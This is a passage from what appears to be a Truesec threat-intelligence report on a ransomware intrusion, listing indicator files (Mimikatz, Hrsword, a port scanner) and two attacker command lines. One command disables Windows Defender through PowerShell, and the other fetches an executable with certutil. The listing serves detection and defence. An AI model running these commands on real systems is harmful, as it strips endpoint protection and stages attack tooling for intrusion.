file2b88d6e9475fc1e035f8e49ebb5a79d3266eccc0Hrsword.exe/hs.exeTool to disable
security products advanced_port_scanner.exeNetwork enumeration
tool Mimikatz.exeCredential dumping tool Mimikatz.bat.bat version of
mimikatz xx.icoRansomware icon
file1BE0A62694883C4CC30CE7A6358AF9953E7B41F4Teamviewer.exeRDP client
Command Lines:
Command lineDescriptionpowershell.exe Set-MpPreference
-DisableRealtimeMonitoring $true -MAPSReporting 0 -SubmitSamplesConsent 0
-UILockdown $true PowerShell command line to disable Windows Defender Real-time
ProtectionC:\Windows\System32\certutil.exe -urlcache -split -f
https://download.advanced-port-scanner.com/download/files/Advanced_Port_Scanner_2.5.3869.exe’
Command line used to download advanced port scanner using certutil.exe
Threat Intelligence
Truesec
TRUESEC
* Who We Are
* Our experts
* Newsroom
* Business Policy
CAREER
* Career
* Job Openings
* Departments
KNOWLEDGE
* Download 2024 Threat Report
* Sign up for newsletter
* Reports
* Guides
CONTACT US
Phone:
Sweden: +46 8 10 00 10
Denmark: +45 32 24 00 70
E-mail:
hello@truesec.com
SWEDEN
Headquarters Stockholm
Luntmakargatan 18
111 37 Stockholm
Malmö
Torggatan 4
Seventh floor
211 40 Malmö
FINLAND
Truesec Oy
Keilaniementie 1
02150 Espoo
DENMARK
Headquarters Copenhagen
Glentevej 69, 1.
2400 Copenhagen
Aarhus
Truesec A/S
Søren Frichs Vej 36F
8230 Aarhus
GERMANY
Truesec GmbH
Rosenheimer Str. 143c
81671 München
FOLLOW US
* Facebook
* X
* LinkedIn
* YouTube
* Truesec Group’s Web Privacy Notice
* Reporting Misconduct
* Sitemap
© Truesec